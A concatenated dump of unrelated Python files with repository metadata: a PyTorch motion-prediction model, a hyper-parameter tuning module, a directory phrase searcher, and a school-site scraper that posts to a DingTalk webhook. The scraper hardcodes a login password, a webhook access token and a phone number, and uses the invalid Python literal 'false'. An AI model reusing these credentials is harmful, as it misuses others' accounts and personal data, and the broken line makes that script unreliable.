x7 = torch.cat((x6, x5), 1)
x7 = F.relu(self.bn7(self.conv7(x7)))
x7 = self.upsample(x7)
x8 = torch.cat((x7, x4), 1)
x8 = F.relu(self.bn8(self.conv8(x8)))
x8 = self.upsample(x8)
x9 = torch.cat((x8, x3), 1)
x9 = F.relu(self.bn9(self.conv9(x9)))
x9 = self.upsample(x9)
x10 = torch.cat((x9, x2), 1)
x10 = F.relu(self.bn10(self.conv10(x10)))
x10 = self.upsample(x10)
x11 = torch.cat((x10, x1), 1)
x11 = F.relu(self.bn11(self.conv11(x11)))
motion_f_x = self.conv_x(x11)
motion_f_y = self.conv_y(x11)
x = self.bn0(self.conv0(im_input_b))
x1 = F.relu(self.bn1(self.conv1(x)))
x2 = self.maxpool(x1)
x2 = F.relu(self.bn2(self.conv2(x2)))
x3 = self.maxpool(x2)
x3 = F.relu(self.bn3(self.conv3(x3)))
x4 = self.maxpool(x3)
x4 = F.relu(self.bn4(self.conv4(x4)))
x5 = self.maxpool(x4)
x5 = F.relu(self.bn5(self.conv5(x5)))
x6 = self.maxpool(x5)
x6 = F.relu(self.bn6(self.conv6(x6)))
x6 = self.upsample(x6)
x7 = torch.cat((x6, x5), 1)
x7 = F.relu(self.bn7(self.conv7(x7)))
x7 = self.upsample(x7)
x8 = torch.cat((x7, x4), 1)
x8 = F.relu(self.bn8(self.conv8(x8)))
x8 = self.upsample(x8)
x9 = torch.cat((x8, x3), 1)
x9 = F.relu(self.bn9(self.conv9(x9)))
x9 = self.upsample(x9)
x10 = torch.cat((x9, x2), 1)
x10 = F.relu(self.bn10(self.conv10(x10)))
x10 = self.upsample(x10)
x11 = torch.cat((x10, x1), 1)
x11 = F.relu(self.bn11(self.conv11(x11)))
motion_b_x = self.conv_x(x11)
motion_b_y = self.conv_y(x11)
m_mask_f_x = F.softmax(motion_f_x)
m_mask_f_y = F.softmax(motion_f_y)
m_mask_b_x = F.softmax(motion_b_x)
m_mask_b_y = F.softmax(motion_b_y)
m_mask_f_x = m_mask_f_x.unsqueeze(1).expand(m_mask_f_x.size(0), m_mask_f_x.size(1), m_mask_f_x.size(1), m_mask_f_x.size(2), m_mask_f_x.size(3)).contiguous()
m_mask_f_x = m_mask_f_x.view(m_mask_f_x.size(0), -1, m_mask_f_x.size(3), m_mask_f_x.size(4))
m_mask_f_y = m_mask_f_y.unsqueeze(2).expand(m_mask_f_y.size(0), m_mask_f_y.size(1), m_mask_f_y.size(1), m_mask_f_y.size(2), m_mask_f_y.size(3)).contiguous()
m_mask_f_y = m_mask_f_y.view(m_mask_f_y.size(0), -1, m_mask_f_y.size(3), m_mask_f_y.size(4))
m_mask_f = m_mask_f_x * m_mask_f_y
m_mask_b_x = m_mask_b_x.unsqueeze(1).expand(m_mask_b_x.size(0), m_mask_b_x.size(1), m_mask_b_x.size(1), m_mask_b_x.size(2), m_mask_b_x.size(3)).contiguous()
m_mask_b_x = m_mask_b_x.view(m_mask_b_x.size(0), -1, m_mask_b_x.size(3), m_mask_b_x.size(4))
m_mask_b_y = m_mask_b_y.unsqueeze(2).expand(m_mask_b_y.size(0), m_mask_b_y.size(1), m_mask_b_y.size(1), m_mask_b_y.size(2), m_mask_b_y.size(3)).contiguous()
m_mask_b_y = m_mask_b_y.view(m_mask_b_y.size(0), -1, m_mask_b_y.size(3), m_mask_b_y.size(4))
m_mask_b = m_mask_b_x * m_mask_b_y
seg_f = construct_seg(m_mask_f, self.m_kernel, self.m_range)
seg_b = construct_seg(m_mask_b, self.m_kernel, self.m_range)
disappear_f = F.relu(seg_f - 1)
appear_f = F.relu(1 - disappear_f)
disappear_b = F.relu(seg_b - 1)
appear_b = F.relu(1 - disappear_b)
pred_f = construct_image(im_input_f[:, -self.im_channel:, :, :], m_mask_f, appear_f, self.m_kernel, self.m_range)
pred_b = construct_image(im_input_b[:, -self.im_channel:, :, :], m_mask_b, appear_b, self.m_kernel, self.m_range)
seg_f = 1 - F.relu(1 - seg_f)
seg_b = 1 - F.relu(1 - seg_b)
attn = (seg_f + 1e-5) / (seg_f + seg_b + 2e-5)
pred = attn.expand_as(pred_f) * pred_f + (1 - attn.expand_as(pred_b)) * pred_b
return pred, m_mask_f, 1 - appear_f, attn, m_mask_b, 1 - appear_b, 1 - attn
def construct_seg(m_mask, m_kernel, m_range):
seg = Variable(torch.Tensor(m_mask.size(0), 1, m_mask.size(2), m_mask.size(3)))
if torch.cuda.is_available():
seg = seg.cuda()
for i in range(m_mask.size(0)):
seg[i, :, :, :] = F.conv2d(m_mask[i, :, :, :].unsqueeze(0), m_kernel, None, 1, m_range)
return seg
def construct_image(im, m_mask, seg, m_kernel, m_range):
fg = im * seg.expand_as(im)
fg_pred = Variable(torch.Tensor(im.size()))
if torch.cuda.is_available():
fg_pred = fg_pred.cuda()
for i in range(im.size(1)):
im_expand = fg[:, i, :, :].unsqueeze(1).expand_as(m_mask) * m_mask
for j in range(im.size(0)):
fg_pred[j, i, :, :] = F.conv2d(im_expand[j, :, :, :].unsqueeze(0), m_kernel, None, 1, m_range)
bg = im * (1 - seg).expand_as(im)
bg_pred = Variable(torch.Tensor(im.size()))
if torch.cuda.is_available():
bg_pred = bg_pred.cuda()
for i in range(im.size(1)):
im_expand = bg[:, i, :, :].unsqueeze(1).expand_as(m_mask) * m_mask
for j in range(im.size(0)):
bg_pred[j, i, :, :] = F.conv2d(im_expand[j, :, :, :].unsqueeze(0), m_kernel, None, 1, m_range)
seg_expand = seg.expand_as(m_mask) * m_mask
fg_seg = Variable(torch.Tensor(seg.size()))
if torch.cuda.is_available():
fg_seg = fg_seg.cuda()
for i in range(im.size(0)):
fg_seg[i, :, :, :] = F.conv2d(seg_expand[i, :, :, :].unsqueeze(0), m_kernel, None, 1, m_range)
pred = fg_seg.expand_as(im) * fg_pred + (1 - fg_seg).expand_as(im) * bg_pred
return pred
|
[
"yangyi02@gmail.com"
] |
yangyi02@gmail.com
|
71320520c3f27f61cf54ae8386fc3bfc92221343
|
91efac4047d3d6f6826597046fbbaf6fe6243550
|
/model_tuning.py
|
affe07c5ad33388efe3e10dae9e2595f3fe4d81f
|
[] |
no_license
|
santhoshhari/data_utilities
|
77736f943122c217ddfd7ba3c5ef32db32c31e6b
|
c90313d0e0faa6d27b83a2c0b7e443f8b3227cf1
|
refs/heads/master
| 2020-03-28T18:55:15.379669
| 2018-09-27T03:01:58
| 2018-09-27T03:01:58
| 148,926,902
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 17,475
|
py
|
import numpy as np
from sklearn.preprocessing import StandardScaler
from sklearn.metrics import roc_auc_score, mean_squared_error
from xgboost import XGBClassifier, XGBRegressor
from sklearn.ensemble import RandomForestClassifier, RandomForestRegressor, forest
from sklearn.linear_model import LogisticRegression, Ridge
from .feature_engineering import *
from .random_forest_support import *
from .data_preparation import *
from tqdm import tqdm, tqdm_notebook
tqdm.monitor_interval = 0
def train_rf_model(param_dict, Xtrain, Xvalid, Ytrain, Yvalid,
metric=roc_auc_score, model_type='classification'):
"""
Function to train a random forest model with a given set of hyper-parameters
:param param_dict: Dict of hyper-parameters that are kept constant
:param Xtrain: Train Data
:param Xvalid: Validation Data
:param Ytrain: Train labels
:param Yvalid: Validation labels
:param metric: Metric to compute model performance on
:param model_type: Model type - classification/regression
:return: Tuned model, train score and validation score computed using the metric
"""
if model_type == 'classification':
model = RandomForestClassifier(**param_dict)
model.fit(Xtrain, Ytrain)
train_preds = model.predict_proba(Xtrain)
valid_preds = model.predict_proba(Xvalid)
train_score = metric(Ytrain, train_preds[:, 1])
valid_score = metric(Yvalid, valid_preds[:, 1])
elif model_type == 'regression':
model = RandomForestRegressor(**param_dict)
model.fit(Xtrain, Ytrain)
train_preds = model.predict(Xtrain)
valid_preds = model.predict(Xvalid)
train_score = metric(Ytrain, train_preds)
valid_score = metric(Yvalid, valid_preds)
else:
raise ValueError('Incorrect model_type. Accepted values - classification and regression')
return model, train_score, valid_score
def train_linear_model(param_dict, Xtrain, Xvalid, Ytrain, Yvalid,
metric=roc_auc_score, model_type='classification'):
"""
Function to train a linear model with a given set of hyper-parameters
:param param_dict: Dict of hyper-parameters that are kept constant
:param Xtrain: Train Data
:param Xvalid: Validation Data
:param Ytrain: Train labels
:param Yvalid: Validation labels
:param metric: Metric to compute model performance on
:param model_type: Model type - classification/regression
:return: Tuned model, train score and validation score computed using the metric
"""
if model_type == 'classification':
model = LogisticRegression(**param_dict)
model.fit(Xtrain, Ytrain)
train_preds = model.predict_proba(Xtrain)
valid_preds = model.predict_proba(Xvalid)
train_score = metric(Ytrain, train_preds[:, 1])
valid_score = metric(Yvalid, valid_preds[:, 1])
elif model_type == 'regression':
model = Ridge(**param_dict)
model.fit(Xtrain, Ytrain)
train_preds = model.predict(Xtrain)
valid_preds = model.predict(Xvalid)
train_score = metric(Ytrain, train_preds)
valid_score = metric(Yvalid, valid_preds)
else:
raise ValueError('Incorrect model_type. Accepted values - classification and regression')
return model, train_score, valid_score
def train_xgb_model(param_dict, Xtrain, Xvalid, Ytrain, Yvalid,
metric=roc_auc_score, model_type='classification'):
"""
Function to train an XGBoost model with a given set of hyper-parameters
:param param_dict: Dict of hyper-parameters that are kept constant
:param Xtrain: Train Data
:param Xvalid: Validation Data
:param Ytrain: Train labels
:param Yvalid: Validation labels
:param metric: Metric to compute model performance on
:param model_type: Model type - classification/regression
:return: Tuned model, train score and validation score computed using the metric
"""
if model_type == 'classification':
model = XGBClassifier(**param_dict)
model.fit(Xtrain, Ytrain)
train_preds = model.predict_proba(Xtrain)
valid_preds = model.predict_proba(Xvalid)
train_score = metric(Ytrain, train_preds[:, 1])
valid_score = metric(Yvalid, valid_preds[:, 1])
elif model_type == 'regression':
model = XGBRegressor(**param_dict)
model.fit(Xtrain, Ytrain)
train_preds = model.predict(Xtrain)
valid_preds = model.predict(Xvalid)
train_score = metric(Ytrain, train_preds)
valid_score = metric(Yvalid, valid_preds)
else:
raise ValueError('Incorrect model_type. Accepted values - classification and regression')
return model, train_score, valid_score
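# Illustrative usage sketch (not from the original repo): calling train_xgb_model on
# synthetic data; the parameter values below are made up, not recommended settings.
#
# from sklearn.datasets import make_classification
# from sklearn.model_selection import train_test_split
# X, y = make_classification(n_samples=500, random_state=0)
# Xtr, Xva, ytr, yva = train_test_split(X, y, test_size=0.2, random_state=0)
# params = {'n_estimators': 200, 'max_depth': 4, 'learning_rate': 0.1}
# model, train_auc, valid_auc = train_xgb_model(params, Xtr, Xva, ytr, yva)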
def train_model_regularized_encoding(train, valid, target_col, params, cat_cols, enc_folds=5,
metric=mean_squared_error, model='xgb', model_type='regression'):
"""
Function to perform model training with support for regularised mean encoding
:param train: Input dataset to train model on
:param valid: Validation dataser
:param target_col: target column name
:param params: Set of hyper-parameters over which the model is to be tuned
sklearn ParameterGrid object
:param cat_cols: categorical columns for mean encoding
:param enc_folds: Number of folds to be used for regularized encoding
:param metric: Metric to evaluate model performance on
:param model: String indicating the type of model (linear, rf, xgb)
:param model_type: Type of model, regression or classification
:return: Trained model, train and validation scores
"""
train_df = train.copy()
valid_df = valid.copy()
train_cats(train_df)
apply_cats(valid_df, train_df)
for col in cat_cols:
train_df = regularized_target_encoding(train_df, col, target_col, splits=enc_folds)
valid_df = mean_encoding_test(valid_df, train_df, col, target_col)
Xtrain, Ytrain = train_df.drop(columns=[target_col]), train_df[target_col]
Xvalid, Yvalid = valid_df.drop(columns=[target_col]), valid_df[target_col]
del train_df
del valid_df
if model == 'linear':
for n, c in Xtrain.items():
# Label encode categorical columns with more than 10 levels
if not is_numeric_dtype(c) and c.nunique() > 10:
Xtrain = numericalize(Xtrain, c, n)
Xvalid = numericalize(Xvalid, c, n)
# One-hot encode categorical variables with 10 or fewer levels
Xtrain = pd.get_dummies(Xtrain, dummy_na=True)
Xvalid = pd.get_dummies(Xvalid, dummy_na=True)
# Scale features
std_sclr = StandardScaler()
Xtrain = std_sclr.fit_transform(Xtrain)
Xvalid = std_sclr.transform(Xvalid)
else:
# Convert categorical variables to numeric representations
for n, c in Xtrain.items():
Xtrain = numericalize(Xtrain, c, n)
for n, c in Xvalid.items():
Xvalid = numericalize(Xvalid, c, n)
if model == 'xgb':
return train_xgb_model(params, Xtrain, Xvalid, Ytrain, Yvalid,
metric=metric, model_type=model_type)
elif model == 'rf':
return train_rf_model(params, Xtrain, Xvalid, Ytrain, Yvalid,
metric=metric, model_type=model_type)
elif model == 'linear':
return train_linear_model(params, Xtrain, Xvalid, Ytrain, Yvalid,
metric=metric, model_type=model_type)
else:
raise ValueError('Incorrect Model, expected rf/xgb/linear')
def train_model_regularized_encoding_cv(train, target_col, param_grid, cat_cols, cv_folds=5,
enc_folds=5, metric=mean_squared_error, model='xgb',
model_type='regression', rf_sample=None):
"""
Function to perform grid search cross-validation with support for regularised mean encoding
:param train: Input dataset Pandas DataFrame
:param target_col: target column name
:param param_grid: Set of hyper-parameters over which the model is to be tuned
sklearn ParameterGrid object
:param cat_cols: categorical columns for mean encoding
:param cv_folds: Number of folds to be used for cross validation
:param enc_folds: Number of folds to be used for regularized encoding
:param metric: Metric to evaluate model performance on
:param model: String indicating the type of model (linear, rf, xgb)
:param model_type: Type of model, regression or classification
:param rf_sample: Number of observations each tree in random forest sees
:return: DataFrame of the parameters explored and corresponding model performance
"""
kf = KFold(cv_folds, random_state=42)
columns = [*param_grid[0].keys()] + ['train_score', 'valid_score']
# Remove class_weight from the columns list
try:
columns.remove('class_weight')
except ValueError:
pass
# Create dataframe with the hyper-parameters as columns
results = pd.DataFrame(columns=columns)
for params in tqdm_notebook(param_grid):
train_scores = list()
valid_scores = list()
for train_idx, test_idx in kf.split(train):
# Split data into train and test
kf_train, kf_test = train.iloc[train_idx], train.iloc[test_idx]
kf_train.reset_index(inplace=True, drop=True)
kf_test.reset_index(inplace=True, drop=True)
train_cats(kf_train)
apply_cats(kf_test, kf_train)
for col in cat_cols:
kf_train = regularized_target_encoding(kf_train, col, target_col, splits=enc_folds)
kf_test = mean_encoding_test(kf_test, kf_train, col, target_col)
Xtrain, Ytrain = kf_train.drop(columns=[target_col]), kf_train[target_col]
Xvalid, Yvalid = kf_test.drop(columns=[target_col]), kf_test[target_col]
if model == 'linear':
for n, c in Xtrain.items():
# Label encode categorical columns with more than 10 levels
if not is_numeric_dtype(c) and c.nunique() > 10:
Xtrain = numericalize(Xtrain, c, n)
Xvalid = numericalize(Xvalid, c, n)
# One-hot encode categorical variables with 10 or fewer levels
Xtrain = pd.get_dummies(Xtrain, dummy_na=True)
Xvalid = pd.get_dummies(Xvalid, dummy_na=True)
# Scale features
std_sclr = StandardScaler()
Xtrain = std_sclr.fit_transform(Xtrain)
Xvalid = std_sclr.transform(Xvalid)
else:
# Convert categorical variables to numeric representations
for n, c in Xtrain.items():
Xtrain = numericalize(Xtrain, c, n)
for n, c in Xvalid.items():
Xvalid = numericalize(Xvalid, c, n)
if model == 'xgb':
_, train_score, valid_score = train_xgb_model(params, Xtrain, Xvalid, Ytrain, Yvalid,
metric=metric, model_type=model_type)
elif model == 'rf':
if rf_sample:
set_rf_samples(rf_sample)
_, train_score, valid_score = train_rf_model(params, Xtrain, Xvalid, Ytrain, Yvalid,
metric=metric, model_type=model_type)
reset_rf_samples()
elif model == 'linear':
_, train_score, valid_score = train_linear_model(params, Xtrain, Xvalid, Ytrain, Yvalid,
metric=metric, model_type=model_type)
else:
raise ValueError('Incorrect Model, expected rf/xgb/linear')
train_scores.append(train_score)
valid_scores.append(valid_score)
to_write = params.copy()
class_weights = to_write.pop('class_weight', None)
if class_weights and class_weights != 'balanced':
try:
for k, v in class_weights.items():
to_write[f'class_{k}'] = v
except AttributeError:
to_write['class_1'] = 'balanced'
to_write['class_0'] = 1
to_write['train_score'] = np.mean(train_scores)
to_write['valid_score'] = np.mean(valid_scores)
results = results.append(pd.DataFrame.from_dict(to_write, orient='index').T)
return results
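# Illustrative sketch (not from the original repo): param_grid above is expected to
# behave like sklearn's ParameterGrid (indexable, iterating over parameter dicts).
# The column and parameter names below are hypothetical.
#
# from sklearn.model_selection import ParameterGrid
# grid = ParameterGrid({'n_estimators': [100, 300], 'max_depth': [3, 6]})
# results = train_model_regularized_encoding_cv(train_df, 'price', grid,
#                                               cat_cols=['city'], model='xgb')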
def choose_params(param_dict, curr_params=None):
"""
Function to choose parameters for next iteration
:param param_dict: Ordered dictionary of hyper-parameter search space
:param curr_params: Dict of current hyper-parameters
:return: Dictionary of sampled parameters
"""
if curr_params:
next_params = curr_params.copy()
param_to_update = np.random.choice(list(param_dict.keys()))
param_vals = param_dict[param_to_update]
curr_index = param_vals.index(curr_params[param_to_update])
if curr_index == 0:
next_params[param_to_update] = param_vals[1]
elif curr_index == len(param_vals) - 1:
next_params[param_to_update] = param_vals[curr_index - 1]
else:
next_params[param_to_update] = \
param_vals[curr_index + np.random.choice([-1, 1])]
else:
next_params = dict()
for k, v in param_dict.items():
next_params[k] = np.random.choice(v)
return next_params
def simulate_annealing(param_dict, const_param, X_train, X_valid,
Y_train, Y_valid, fn_train=train_xgb_model, maxiters=100,
alpha=0.85, beta=1.3, T_0=0.40, update_iters=5):
"""
Function to perform hyper-parameter search using simulated annealing
Detailed explanation at https://github.com/santhoshhari/simulated_annealing
:param param_dict: Ordered dictionary of hyper-parameter search space
:param const_param: Static parameters of the model
:param X_train: Train Data
:param X_valid: Validation Data
:param Y_train: Train labels
:param Y_valid: Validation labels
:param fn_train: Function to train the model
(Should return model and metric value as tuple)
:param maxiters: Number of iterations to perform the parameter search for
:param alpha: factor to reduce temperature
:param beta: constant in probability estimate
:param T_0: Initial temperature
:param update_iters: # of iterations required to update temperature
:return: DataFrame of the parameters explored and corresponding model performance
"""
columns = [*param_dict.keys()] + ['Metric', 'Best Metric', 'Train Metric']
results = pd.DataFrame(index=range(maxiters), columns=columns)
best_metric = -1.
prev_metric = -1.
prev_params = None
best_params = dict()
weights = list(map(lambda x: 10 ** x, list(range(len(param_dict)))))
hash_values = set()
T = T_0
for i in tqdm_notebook(range(maxiters)):
while True:
curr_params = choose_params(param_dict, prev_params)
indices = [param_dict[k].index(v) for k, v in curr_params.items()]
hash_val = sum([i * j for (i, j) in zip(weights, indices)])
if hash_val in hash_values:
tqdm.write('Combination revisited')
else:
hash_values.add(hash_val)
break
all_params = curr_params.copy()
all_params.update(const_param)
model, train_score, valid_score = fn_train(all_params, X_train, X_valid, Y_train, Y_valid)
if valid_score > prev_metric:
tqdm.write(f'Local Improvement in metric from {prev_metric:.4} to {valid_score:.4}' \
+ ' - parameters accepted')
prev_params = curr_params.copy()
prev_metric = valid_score
if valid_score > best_metric:
tqdm.write(f'Global improvement in metric from {best_metric:.4f} to {valid_score:.4}' \
+ ' - best parameters updated')
best_metric = valid_score
best_params = curr_params.copy()
best_model = model
else:
rnd = np.random.uniform()
diff = valid_score - prev_metric
threshold = np.exp(beta * diff / T)
if rnd < threshold:
tqdm.write('No Improvement but parameters accepted. Metric change: ' +
f'{diff:.4} threshold: {threshold:.4} random number: {rnd:.4}')
prev_metric = valid_score
prev_params = curr_params
else:
tqdm.write('No Improvement and parameters rejected. Metric change: ' +
f'{diff:.4} threshold: {threshold:.4} random number: {rnd:.4}')
results.loc[i, list(curr_params.keys())] = list(curr_params.values())
results.loc[i, 'Metric'] = valid_score
results.loc[i, 'Best Metric'] = best_metric
results.loc[i, 'Train Metric'] = train_score
if i % update_iters == 0:
T = alpha * T
return results, best_model, best_params
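# Illustrative note (not part of the original module): a worse parameter set is accepted
# with probability exp(beta * diff / T), where diff is negative. With the defaults
# beta=1.3 and T_0=0.40, a 0.02 drop in the validation metric is still accepted with
# probability exp(1.3 * -0.02 / 0.40) ~= 0.94, and that probability shrinks as T is
# multiplied by alpha every update_iters iterations.
#
# import numpy as np
# np.exp(1.3 * -0.02 / 0.40)  # ~0.937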
if __name__ == '__main__':
print('Module can only be imported.')
|
[
"shari@dons.usfca.edu"
] |
shari@dons.usfca.edu
|
1e08e03c5602e773fea189066d6e3c57d3c68264
|
acb4ec8f4e789b2f9ebcb9e93b9b58d53d195df7
|
/python_007.py
|
ef8f2db123550d11c02594e4eb0c6e7ca62773c4
|
[] |
no_license
|
andrewPompa/pjs
|
2948ee69934d242fb79a28b9b9f76db6358ead39
|
f7614ae67b86129aa9152e51230162d61110eeba
|
refs/heads/master
| 2021-03-27T20:05:16.576409
| 2018-01-20T21:26:52
| 2018-01-20T21:26:52
| 105,984,552
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,393
|
py
|
#!/usr/bin/python
# -*- coding: utf-8
# Import module support
import argparse
import os
import string
from functools import reduce
import re
import NumberValidator
import sys
from GrepModule import PatternOccurrences, calculate_occurrences
program_name = sys.argv[0]
class Dir:
def __init__(self, path):
self.path = path
self.phrases = []
def print_help():
print("Przeszukiwacz kartotek %s -d katalog frazy" % program_name)
print("przykład: %s -d ~/lib -d ~/scripts pier -d ~/bin dru" % program_name)
print("frazy - frazy do wyszukania")
def print_error(message):
sys.stderr.write("[ERROR] %s\n" % message)
print_help()
sys.exit(2)
def append_directories_to_search(paths_, phrases_, directories_to_search_):
if paths_ and not phrases_:
print_error("Nie ma fraz dla katalogów do wszukania")
for path_to_search in paths_:
dir_to_search = Dir(path_to_search)
for phrase in phrases_:
dir_to_search.phrases.append(phrase)
directories_to_search_.append(dir_to_search)
if len(sys.argv) == 1:
print_error("Błąd składni")
if sys.argv[1] != "-d":
print_error("Oczekiwano katalogu")
directories_to_search = []
paths = []
phrases = []
sys.argv.pop(0)
while sys.argv:
argument = sys.argv.pop(0)
if argument == "-d" and len(phrases) != 0:
append_directories_to_search(paths, phrases, directories_to_search)
paths = []
phrases = []
if argument == "-d":
if sys.argv:
argument = sys.argv.pop(0)
else:
print_error("Oczekiwano wartości")
paths.append(argument)
continue
phrases.append(argument)
append_directories_to_search(paths, phrases, directories_to_search)
# for directory in directories_to_search:
# print(directory.path),
# print(directory.phrases)
patterns = {}
for pattern_id, phrase in enumerate(phrases):
patterns[phrase + str(pattern_id)] = PatternOccurrences(phrase)
for directory in directories_to_search:
# print("searching in %s" % directory.path)
for root, dirs, files in os.walk(directory.path):
for file_name in files:
# print("File: %s" % file_name)
calculate_occurrences(root + '/' + file_name, patterns)
for key in patterns:
print("%s wystąpił %d razy" % (patterns[key].pattern, patterns[key].occurrences))
|
[
"mijo@ailleron.com"
] |
mijo@ailleron.com
|
b120db8ee5306c60979bd4c6ab69c8226a685263
|
e8e152dacd2d975f2a880c89589e16cf63a80d75
|
/SendMsgToDD/SendToTest.py
|
cf99b9d85e019f9fdd442ef5f64d1c849eeaa9b9
|
[] |
no_license
|
tiger4066/PythonProject
|
d434e754d4ccf7d5e9fc9e49261d7722894b5ad8
|
7dbae45e0bd6817996d8646aa65fcc7544543771
|
refs/heads/master
| 2020-03-23T17:26:16.768104
| 2018-07-22T02:46:05
| 2018-07-22T02:46:05
| 141,859,964
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,244
|
py
|
import requests
from bs4 import BeautifulSoup
from lxml import etree
import re
url = 'http://lkzx.net/index_main.aspx?tabid=1'
UA = "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.13 Safari/537.36"
header = {
"User-Agent": UA,
"Connection":"close" #加上这一行,解决:Failed to establish a new connection: [WinError 10048]
}
v2ex_session = requests.Session()
f = v2ex_session.get(url, headers=header)
'''
Getting the value with the XPath approach: works poorly for hidden elements whose XPath cannot be read directly from the browser
tree=etree.HTML(f.content)
nodes=tree.xpath('//*[@id="_ctl2_Btn_Login"]')[0].get('type')
print(nodes)
'''
'''Getting the value with BeautifulSoup: no garbled characters and it works well, though it may be a bit slower
soup = BeautifulSoup(f.content,"html.parser")
value = soup.find('input', {'id': '_ctl2_Btn_Login'}).get('value')
print(value)
'''
soup = BeautifulSoup(f.content, "html.parser")
# print(soup)
# Either of the two approaches below retrieves the value attribute
#value = soup.find('input', {'name': '__VIEWSTATE'})['value']
VIEWSTATE = soup.find('input', {'name': '__VIEWSTATE'}).get('value')
UserName = '林文彪'
UserName = UserName.encode('gb2312')
Btn_Login = '登录'
Btn_Login = Btn_Login.encode('gb2312')
postData = {
'__VIEWSTATE': VIEWSTATE,
'_ctl2:Txt_UserName': UserName,
'_ctl2:Txt_Password': '3874',
'_ctl2:Btn_Login': Btn_Login,
'_ctl8:Txt_Title': ''
}
v2ex_session.post(url,
data=postData,
headers=header)
txt = open('test.txt', 'w', encoding='GBK')
for p in range(1, 2):
#url = 'http://www.lkzx.net/page/message/EN_MessageBox.aspx?pageindex=' + \
#    str(p)+'&&action=getbox&&isdel=0'  # list of my messages
url = 'http://www.lkzx.net/Page/Document/EN_DocumentMoreList.aspx?pageindex='+\
str(p)+'&moduleid=138&tabid=12'  # list of announcements
print(url)
f = v2ex_session.get(url, headers=header)
soup = BeautifulSoup(f.content, "html.parser")
# for i in soup.find_all(id=re.compile('_ctl1_DL_AnounceAdmi')):
# for i in soup.find_all(id=re.compile('_ctl1_DL_AnounceAdmin__ctl[1-9][0-9]?_Lbl_Title')):
for i in soup.find_all(id=re.compile('_ctl0_DL_DocumentList__ctl[1-9][0-9]?_tr1')):
# print(type(x)) <tr id="_ctl0_DL_DocumentList__ctl1_tr1
i = i.decode()
#txt.write(i)
pattern = re.compile(r'<span id.*?>(.*?)</span>.*?documentid=(.*?)\".*?title=\"(.*?)\".*?Lbl_ModuleName\">(.*?)</span>',re.S)
items = re.findall(pattern, i)
'''for item in items:
print(item)'''
for item in items:
print(item[0],item[1],item[2],item[3])
# print(soup.get_text())
# print(f.text)
txt.close()
# Send a message to the DingTalk group robot
#https://oapi.dingtalk.com/robot/send?access_token=718c7852eb9a0687f5559dc4503de013d523c5addf9fd3057eb1de4ba7be426f
mesUrl='https://oapi.dingtalk.com/robot/send?access_token=718c7852eb9a0687f5559dc4503de013d523c5addf9fd3057eb1de4ba7be426f'
data={
"msgtype": "text",
"text": {
"content": "我就是我, 是不一样的烟火"
},
"at": {
"atMobiles": [
"18928686223"
],
"isAtAll": false
}
}
r = requests.post(url=mesUrl, json=data)  # the robot endpoint expects a JSON body
print(r.text)
|
[
"tiger406@qq.com"
] |
tiger406@qq.com
|
9bd5ac1d6ba7fc415b10e2563a4e94ebe6f6cd3a
|
c6613d54db965247977a6593af7867c637c73de5
|
/python_函式與參數/function-basic.py
|
91e9bb05c4783fdc1ca7dc82b4b0516b5b1ea272
|
[] |
no_license
|
a0988986570/python_training
|
b7ff11f6b35308d69f055d4805f6a42c20a51a07
|
87f2e4e5a918579d04c0952b05abc75b14098610
|
refs/heads/master
| 2020-07-23T05:42:34.304494
| 2019-09-30T15:54:52
| 2019-09-30T15:54:52
| 207,461,361
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 667
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Mon Sep 16 12:26:40 2019
@author: user
"""
# Define a function
# Code inside a function body does not execute unless the function is called
def multipy(n1,n2):
print(n1*n2)
#return 10
return n1*n2
# Call the function
x=multipy(3,4)
print(x) # the call evaluates to whatever return sends back; without a return the function returns None
# Example
def multipy1(n1,n2):
return n1*n2
value=multipy1(3,4)+multipy1(10,5)
print(value)
# Functions can be used to package code: the same task can be handed off to a function
def calculate(max):
sum=0
for n in range(1,max+1): #1+...+max
sum=sum+n
print(sum)
calculate(10)
calculate(20)
|
[
"a0988986570@gmail.com"
] |
a0988986570@gmail.com
|
1bfafbcc70873f685f59ae768893dc6f2aadc31d
|
bdf4b83e8b28e3ac552ef7b648d3344e3d52e9fd
|
/checkinclusion.py
|
d204075a4de6bab5491752c4990f5b644f7d66fa
|
[] |
no_license
|
uddipt1507/Applied-Crypto-Merkel-Tree
|
32522af83deaef14abd67a897bbdb45a0ce4e366
|
bbf60e579e582dcaf0b5bdca40f1f1e4e8e93c99
|
refs/heads/master
| 2022-12-17T06:54:55.073573
| 2020-09-12T04:56:30
| 2020-09-12T04:56:30
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 701
|
py
|
#!/usr/bin/python3
import ast,sys,hashlib
def parseFile():
f = open("merkle.tree","r")
tree ={}
for line in f:
lineArray = line.split(" ")
if lineArray[0] == 'Parent(concatenation':
tree[lineArray[6]] = lineArray[10]
else:
tree[lineArray[3]] = lineArray[7]
return tree
def checkInclusion(inputString,tree):
out = []
for key,value in tree.items():
if inputString in key:
out.append(value)
inputString = value
return out
inputString = sys.argv[1]
tree = parseFile()
out = checkInclusion(inputString,tree)
if(len(out)> 0):
print("yes",out)
else:
print("no")
|
[
"noreply@github.com"
] |
uddipt1507.noreply@github.com
|
c66a856d70350d3698a0acab1cbc9f1d3152b332
|
9147ff9354b5f5e3cd526408701a9061f64122ad
|
/indy_client/test/agent/test_restore_agent_wallets_from_mgl.py
|
7582687a95b72d6f0498d0cd20257b1537af9f20
|
[
"Apache-2.0"
] |
permissive
|
trongnhan1312400/indy-node
|
07d04e7e880b90b10b99cf0b9bc0df1742917253
|
ca6cda2a049171a98e4758240a00e97ea449ea25
|
refs/heads/master
| 2021-09-01T09:28:43.114840
| 2017-12-26T07:45:30
| 2017-12-26T07:45:30
| 111,093,792
| 0
| 0
| null | 2017-11-17T11:02:14
| 2017-11-17T11:02:13
| null |
UTF-8
|
Python
| false
| false
| 2,325
|
py
|
import os
import shutil
from indy_client.agent.walleted_agent import WalletedAgent
from indy_client.anon_creds.indy_issuer import IndyIssuerWalletInMemory
from indy_client.anon_creds.indy_public_repo import IndyPublicRepo
from indy_client.client.wallet.wallet import Wallet
from indy_client.test.client.TestClient import TestClient
from indy_common.config_util import getConfig
from stp_core.network.port_dispenser import genHa
